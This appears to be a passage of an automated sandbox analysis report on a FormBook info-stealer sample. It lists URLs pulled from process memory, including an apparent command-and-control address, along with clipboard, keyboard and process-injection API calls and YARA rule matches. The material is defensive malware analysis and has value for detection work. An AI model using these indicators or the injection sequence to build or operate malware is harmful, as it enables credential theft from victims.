            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Palcoconnector.net
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39J
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39J
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39JiqpfnJPBMT
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39Jiq
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAN39Ji
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net
            Source: RpcPing.exe, 00000005.00000002.4131706489.0000000005BE0000.00000004.00000800.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4131107461.000000000500D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.torex33.online
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4131107461.000000000500D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.torex33.online/hd7m/
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000003FB0000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000038B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004142000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000003A42000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: RpcPing.exe, 00000005.00000002.4129603004.000000000491C000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.000000000421C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000005.00000003.2073830461.000000000764E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033%l
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.torex33.online&rand=
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000005.00000003.2078909862.000000000766D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_s
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_hos
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.torex33.online&utm_medium=parking&utm_campaign=s_land_c
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.torex33.online&utm_medium=parking&utm_c
            Source: RpcPing.exe, 00000005.00000002.4129603004.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.00000000043AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.torex33.online&amp;reg_source=parking_auto
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4E3 NtClose,2_2_0042C4E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA4340 NtSetContextThread,LdrInitializeThunk,5_2_02CA4340
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA4650 NtSuspendThread,LdrInitializeThunk,5_2_02CA4650
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AD0 NtReadFile,LdrInitializeThunk,5_2_02CA2AD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AF0 NtWriteFile,LdrInitializeThunk,5_2_02CA2AF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02CA2BE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02CA2BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02CA2BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2B60 NtClose,LdrInitializeThunk,5_2_02CA2B60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02CA2EE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02CA2E80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FE0 NtCreateFile,LdrInitializeThunk,5_2_02CA2FE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FB0 NtResumeThread,LdrInitializeThunk,5_2_02CA2FB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F30 NtCreateSection,LdrInitializeThunk,5_2_02CA2F30
